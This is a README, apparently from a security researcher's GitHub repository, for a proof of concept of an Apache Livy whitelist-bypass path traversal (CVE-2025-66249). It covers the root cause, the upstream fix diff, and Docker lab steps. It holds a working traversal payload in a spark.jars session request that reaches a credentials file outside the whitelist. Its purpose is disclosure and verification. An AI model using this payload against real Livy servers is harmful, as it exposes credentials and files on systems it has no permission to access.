sid6224/CVE-2025-66249-POC

# CVE-2025-66249 — Apache Livy 路径穿越白名单绕过         ## 概述 | 字段 | 详情 | |-----------|--------| | CVE ID | CVE-2025-66249 | | 严重程度 | Important (CVSS N/A — 截至 2026-03-15 NVD 评估待定) | | 受影响版本 | Apache Livy 0.3.0-incubating 至 0.8.0-incubating — **仅当 `livy.file.local-dir-whitelist` 设置为非默认值时** | | 修复版本 | Apache Livy 0.9.0-incubating | | CWE | CWE-22: 对路径名称限制不当（'路径穿越'） | | 披露时间 | 2026-03-12 (OSS-Sec) / 2026-03-13 (NVD) | | 报告者 | Hiroki Egawa (发现者) | ## 漏洞描述 拥有 Livy REST 或 JDBC 接口访问权限的已认证用户可以提交一个 Spark 会话或批处理作业，其中包含精心构造的文件路径配置值，该值可绕过 允许的目录白名单。 **根本原因 — 白名单检查中的路径穿越绕过 (`Session.scala`)** 当配置了 `livy.file.local-dir-whitelist` 时，Livy 0.8.0 通过对 **原始、未规范化的**路径调用 Java 的 `String.startsWith()` 来验证提交的 路径。 此检查可以使用 `../` 穿越序列进行绕过： ``` /opt/safe-data/../sensitive/secret.txt ``` 原始字符串以 `/opt/safe-data` 开头，因此检查通过 — 但该路径 解析为 `/opt/sensitive/secret.txt`，该位置**完全在白名单 目录之外**。 **触发条件：** 该漏洞仅在 `livy.file.local-dir-whitelist` 设置为**非默认（非空）**值时才能被利用。 如果白名单为空（默认值），路径验证将被完全跳过，该问题 不会被触发。 **影响：** 通过 Livy REST API 提交会话的攻击者可以引用 Livy 服务器主机上的任意本地文件。在共享分析集群中，这 意味着可能泄露凭证、密钥、配置文件或任何 Livy 进程用户可读取的数据。 ## 受影响的源文件 ### 文件 — `Session.scala` **易受攻击版本 (v0.8.0):** https://github.com/apache/incubator-livy/blob/v0.8.0-incubating/server/src/main/scala/org/apache/livy/sessions/Session.scala **已修复版本 (v0.9.0):** https://github.com/apache/incubator-livy/blob/v0.9.0-incubating/server/src/main/scala/org/apache/livy/sessions/Session.scala ## 源代码 — 克隆命令 这两个版本均直接从 Apache Livy 官方 GitHub 仓库克隆 使用了以下确切命令： **仓库:** https://github.com/apache/incubator-livy ``` # 易受攻击版本 — 克隆到 ./livy-0.8.0/ git clone --depth=1 --branch v0.8.0-incubating \ https://github.com/apache/incubator-livy \ livy-0.8.0 # 已修复版本 — 克隆到 ./livy-0.9.0/ git clone --depth=1 --branch v0.9.0-incubating \ https://github.com/apache/incubator-livy \ livy-0.9.0 ``` | 版本 | 标签 | 解析的提交 | 本地路径 | |------------------|-----------------------|--------------------------------------------|---------------| | 0.8.0-incubating | `v0.8.0-incubating` | `78b512658e4baf1183f2b352203ada1928d8111a` | `./livy-0.8.0/` | | 0.9.0-incubating | `v0.9.0-incubating` | `7215f209b25b96488189567807eaded00953a492` | `./livy-0.9.0/` | ## 具体代码差异 ### 修复 — `Session.scala`: 在白名单检查前调用 `Paths.get().normalize()` ``` import java.io.InputStream import java.net.{URI, URISyntaxException} +import java.nio.file.Paths import java.security.PrivilegedExceptionAction +import java.util.concurrent.{Executors, LinkedBlockingQueue, ThreadFactory, ThreadPoolExecutor, TimeUnit} import java.util.UUID ... if (resolved.getScheme() == "file") { // Make sure the location is whitelisted before allowing local files to be added. - require(livyConf.localFsWhitelist.find(resolved.getPath().startsWith).isDefined, + require(livyConf.localFsWhitelist.find( + Paths.get(resolved.getPath()).normalize.startsWith).isDefined, s"Local path ${uri.getPath()} cannot be added to user sessions.") } ``` **v0.8.0 中的影响:** 原始字符串的 `startsWith` 检查可以通过路径穿越 Payload 绕过。 示例：如果 `livy.file.local-dir-whitelist = /opt/safe-data` ``` /opt/safe-data/../sensitive/secret.txt ``` - v0.8.0: `"/opt/safe-data/../sensitive/secret.txt".startsWith("/opt/safe-data")` → **true** (已绕过) - v0.9.0: `Paths.get("/opt/safe-data/../sensitive/secret.txt").normalize` → `/opt/sensitive/secret.txt` `/opt/sensitive/secret.txt`.startsWith(`/opt/safe-data`) → **false** (已阻止) 差异是通过在本地克隆两个标签（见上文）并运行以下命令生成的： ``` diff -u \ livy-0.8.0/server/src/main/scala/org/apache/livy/sessions/Session.scala \ livy-0.9.0/server/src/main/scala/org/apache/livy/sessions/Session.scala ``` ## 攻击向量摘要 ``` Attacker (authenticated REST/JDBC user) │ ▼ POST /sessions { "conf": { "spark.jars": "file:///opt/safe-data/../sensitive/secret.txt" ← path starts with whitelisted prefix — String.startsWith() passes ← but resolves OUTSIDE the directory via ../ traversal } } │ ▼ Livy 0.8.0 — whitelist check bypassed (raw startsWith, no normalisation) │ ▼ Spark reads the file and distributes it to executors │ ▼ Attacker retrieves file contents via job output / logs ``` ## 测试环境 本 PoC 中的所有步骤均在以下系统上执行和验证： | 组件 | 详情 | |----------------------------------|--------| | 主机操作系统 | Ubuntu 24.04.4 LTS (Noble Numbat) | | 内核 | 6.17.0-14-generic x86\_64 | | 架构 | x86\_64 | | 总内存 | 15 GiB | | Docker Engine | 28.2.2 | | 主机 JDK | OpenJDK 17.0.18 (仅主机使用 — 容器使用 eclipse-temurin:11-jdk-focal) | | 容器基础镜像 | eclipse-temurin:11-jdk-focal (JDK 11, Ubuntu Focal) | | Spark 版本 (两个镜像) | 3.1.3 with Hadoop 3.2 | | Livy 版本 — 易受攻击镜像 | 0.8.0-incubating | | Livy 版本 — 已修复镜像 | 0.9.0-incubating | ## 目录结构 ``` CVE-2025-66249-POC/ ├── docker/ │ ├── fixed/ │ │ ├── Dockerfile │ │ ├── livy.conf │ │ └── start.sh │ └── vulnerable/ │ ├── Dockerfile │ ├── livy.conf │ └── start.sh ├── test/ │ └── validate.sh ├── .gitignore ├── LICENSE └── README.md ``` ## 概念验证 ### 概述 ``` docker/vulnerable/ → image: cve-2025-66249-vulnerable (Livy 0.8.0 + Spark 3.1.3) docker/fixed/ → image: cve-2025-66249-fixed (Livy 0.9.0 + Spark 3.1.3) test/validate.sh → single script, run unchanged against both environments ``` 完整的端到端流程 — 按顺序执行步骤 1 至 4： ``` Step 1: Build vulnerable image → start container → verify Livy is up Step 2: Run validate.sh → confirm VULNERABLE (attack HTTP 201) → stop container Step 3: Build fixed image → start container → verify Livy is up Step 4: Run validate.sh → confirm FIXED (attack HTTP 400) → stop container ``` ### 步骤 1 — 构建并启动易受攻击的环境 (Livy 0.8.0 + Spark 3.1.3) **文件:** - `docker/vulnerable/Dockerfile` — eclipse-temurin:11-jdk-focal, Spark 3.1.3, Livy 0.8.0-incubating - `docker/vulnerable/livy.conf` — 绑定 `0.0.0.0:8998`, 本地模式, 白名单 = `/opt/safe-data` **1a. 构建镜像:** ``` docker build -t cve-2025-66249-vulnerable docker/vulnerable/ ``` **验证 — 镜像已创建:** ``` docker images cve-2025-66249-vulnerable ``` 预期输出: ``` REPOSITORY TAG IMAGE ID CREATED SIZE cve-2025-66249-vulnerable latest ``` **1b. 启动容器:** ``` docker run -d --name livy-vulnerable -p 8998:8998 cve-2025-66249-vulnerable ``` **验证 — 容器正在运行:** ``` docker ps --filter name=livy-vulnerable ``` 预期输出: ``` CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES cve-2025-66249-vulnerable "/__cacert_entrypoin…" ago Up X seconds 0.0.0.0:8998->8998/tcp, [::]:8998->8998/tcp livy-vulnerable ``` **1c. 等待 Livy 启动，然后验证 REST API:** ``` sleep 20 curl -s http://localhost:8998/sessions ``` 预期输出: ``` {"from":0,"total":0,"sessions":[]} ``` **1d. 验证容器内的目录布局:** 确认白名单内的安全文件存在: ``` docker exec livy-vulnerable cat /opt/safe-data/safe.txt ``` 预期输出: ``` This file lives inside the whitelisted directory. ``` 确认白名单外的敏感文件存在: ``` docker exec livy-vulnerable cat /opt/sensitive/secret.txt ``` 预期输出: ``` SECRET_KEY=abcdef1234567890 DB_PASSWORD=SuperSecret! ``` ### 步骤 2 — 针对易受攻击的环境运行验证 **`test/validate.sh` 测试内容:** | # | 攻击 | Payload 键 | Livy 0.8.0 上的预期结果 | |---|--------|-------------|-------------------------------| | 1 | 通过 `Session.scala` 中的 `String.startsWith()` 进行路径穿越 | 带有 `../` 穿越的 `spark.jars` | HTTP 201 — 穿越绕过白名单 | **2a. 运行脚本:** ``` bash test/validate.sh ``` **预期输出:** ``` Waiting for Livy to become ready at http://localhost:8998 (timeout 60s)... Livy is ready. TEST : Path traversal via spark.jars (String.startsWith bypass) WHAT : spark.jars path using '../' to escape /opt/safe-data whitelist PAYLOAD : {"kind":"spark","conf":{"spark.jars":"file:///opt/safe-data/../sensitive/secret.txt"}} HTTP CODE : 201 RESPONSE : {"id":,...,"conf":{"spark.jars":"file:///opt/safe-data/../sensitive/secret.txt"},...} [VULNERABLE] Livy ACCEPTED the request (HTTP 201). Path was NOT normalised — traversal bypasses whitelist check. RESULT: VULNERABLE — exit code 1 ``` **2b. 停止并移除易受攻击的容器:** ``` docker stop livy-vulnerable && docker rm livy-vulnerable ``` **验证 — 容器已完全移除:** ``` docker ps -a --filter name=livy-vulnerable ``` 预期输出 (空 — 无行): ``` CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES ``` ### 步骤 3 — 构建并启动已修复的环境 (Livy 0.9.0 + Spark 3.1.3) **文件:** - `docker/fixed/Dockerfile` — 相同的基础镜像和 Spark 3.1.3，仅 Livy 版本更改为 0.9.0-incubating - `docker/fixed/livy.conf` — 与 `docker/vulnerable/livy.conf` 相同 (相同的白名单, 端口, 模式) **3a. 构建镜像:** ``` docker build -t cve-2025-66249-fixed docker/fixed/ ``` **验证 — 镜像已创建:** ``` docker images cve-2025-66249-fixed ``` 预期输出: ``` REPOSITORY TAG IMAGE ID CREATED SIZE cve-2025-66249-fixed latest ``` **3b. 启动容器:** ``` docker run -d --name livy-fixed -p 8998:8998 cve-2025-66249-fixed ``` **验证 — 容器正在运行:** ``` docker ps --filter name=livy-fixed ``` 预期输出: ``` CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES cve-2025-66249-fixed "/__cacert_entrypoin…" ago Up X seconds 0.0.0.0:8998->8998/tcp, [::]:8998->8998/tcp livy-fixed ``` **3c. 等待 Livy 启动，然后验证 REST API:** ``` sleep 20 curl -s http://localhost:8998/sessions ``` 预期输出: ``` {"from":0,"total":0,"sessions":[]} ``` **3d. 验证容器内的目录布局:** 确认白名单内的安全文件存在: ``` docker exec livy-fixed cat /opt/safe-data/safe.txt ``` 预期输出: ``` This file lives inside the whitelisted directory. ``` 确认白名单外的敏感文件存在: ``` docker exec livy-fixed cat /opt/sensitive/secret.txt ``` 预期输出: ``` SECRET_KEY=abcdef1234567890 DB_PASSWORD=SuperSecret! ``` ### 步骤 4 — 针对已修复的环境运行相同的验证 **步骤 2 与步骤 4 之间的变化:** - 相同的 Payload，相同的脚本 - Livy 0.9.0 现在在白名单检查前使用 `Paths.get().normalize()` 规范化路径 - 攻击在会话创建前被拒绝，返回 HTTP 400 **4a. 运行脚本:** ``` bash test/validate.sh ``` **预期输出:** ``` Waiting for Livy to become ready at http://localhost:8998 (timeout 60s)... Livy is ready. TEST : Path traversal via spark.jars (String.startsWith bypass) WHAT : spark.jars path using '../' to escape /opt/safe-data whitelist PAYLOAD : {"kind":"spark","conf":{"spark.jars":"file:///opt/safe-data/../sensitive/secret.txt"}} HTTP CODE : 400 RESPONSE : {"msg":"Rejected, Reason: requirement failed: Local path /opt/safe-data/../sensitive/secret.txt cannot be added to user sessions."} [FIXED] Livy REJECTED the request (HTTP 400). Path normalisation blocked the traversal. RESULT: FIXED — exit code 0 ``` **错误信息确认的内容:** | 攻击 | HTTP | 错误信息 | 根本原因已修复 | |--------|------|---------------|-----------------| | 通过 `spark.jars` 进行路径穿越 | 400 | `Local path /opt/safe-data/../sensitive/secret.txt cannot be added to user sessions.` | `Session.scala` 中添加了 `Paths.get(...).normalize()`; 在白名单比较前解析 `../` | **4b. 停止并移除已修复的容器:** ``` docker stop livy-fixed && docker rm livy-fixed ``` **验证 — 容器已完全移除:** ``` docker ps -a --filter name=livy-fixed ``` 预期输出 (空 — 无行): ``` CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES ``` ## 推断 CVE-2025-66249 是白名单执行中的一个单一、针对性的逻辑缺陷，该白名单 保护 Livy 的本地文件系统访问路径。 白名单 (`livy.file.local-dir-whitelist`) 在所有受影响版本中均 存在且配置正确。失败在于白名单的评估方式： **路径穿越绕过（唯一的弱点）:** `Session.scala` 中的白名单比较 对原始路径字符串使用了 Java 的 `String.startsWith()`。这对于 文件系统路径比较是不够的，因为它没有考虑 `..` 穿越段。诸如 `/opt/safe-data/../sensitive/secret.txt` 这样的路径 满足针对白名单条目 `/opt/safe-data` 的字符串检查，但解析到的 位置完全在其之外。 0.9.0 中的修复是最小化且针对性的：在白名单比较之前添加了一个 对 `Paths.get().normalize()` 的调用。这会在 `startsWith` 检查 运行之前解析所有 `..` 段，因此穿越 Payload 能被正确识别为 指向允许目录之外的位置。 **防御者的关键要点:** 该漏洞仅在 `livy.file.local-dir-whitelist` 设置为非空值时才可被利用。虽然这 意味着默认配置不会直接受到攻击，但任何收紧了 白名单（即明确限制了 Livy 可访问的目录）的部署反而 是受影响的一方 — 因为正是白名单的存在激活了有缺陷的 代码路径。升级到 Livy 0.9.0-incubating 是唯一 完整的修复方案。 ## 参考 - NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-66249 - OSS-Sec 披露: http://www.openwall.com/listsoss-security/2026/03/12/2 - Apache 邮件列表: https://lists.apache.org/thread/1xwphsfn4jbtym4k4o0zlvwfogwqwwc3 - Apache Livy 项目: https://livy.apache.org/ ## 致谢 - **Hiroki Egawa** — CVE-2025-66249 向 Apache 安全团队的原始报告者。 - **Apache Livy 维护者** — 感谢在 v0.9.0-incubating 中的快速分类和针对性修复。 - **Apache 安全团队** — 感谢协调负责任的披露流程。 - **OSS-Sec 社区** — 感谢公开披露线程使独立分析成为可能。 ## 贡献 欢迎贡献以改进此 PoC 或文档！请确保任何贡献： - 遵循负责任的披露实践 - 包含适当的免责声明 - 除教育演示外，不包含恶意代码 - 保持教育价值重心 如需贡献，请打开 Pull Request 或提交描述建议更改的 Issue。 ## 许可证 本项目采用 [MIT 许可证](LICENSE) 授权。 ## 免责声明 本仓库仅用于教育和安全研究目的。概念 验证展示了漏洞机制，以帮助理解和防御 措施。请勿对您不拥有或未获得明确书面 测试许可的系统使用本仓库内容。 ## 标签 `cve-2025-66249` `apache-livy` `path-traversal` `whitelist-bypass` `cwe-22` `improper-path-restriction` `livy-0.8.0` `livy-0.9.0` `security-research` `proof-of-concept` `docker` `java` `scala` `vulnerability-analysis` `rest-api-security` `string-startswith-bypass` `path-normalisation`

标签：Apache Livy, CVE-2025-66249, CWE-22, JS文件枚举, Maven, POC, Scala, SDLC, Spark, 中间件漏洞, 任意文件访问, 大数据安全, 应用安全, 文件读取, 漏洞复现, 漏洞验证, 白名单绕过, 网络安全审计, 请求拦截, 路径遍历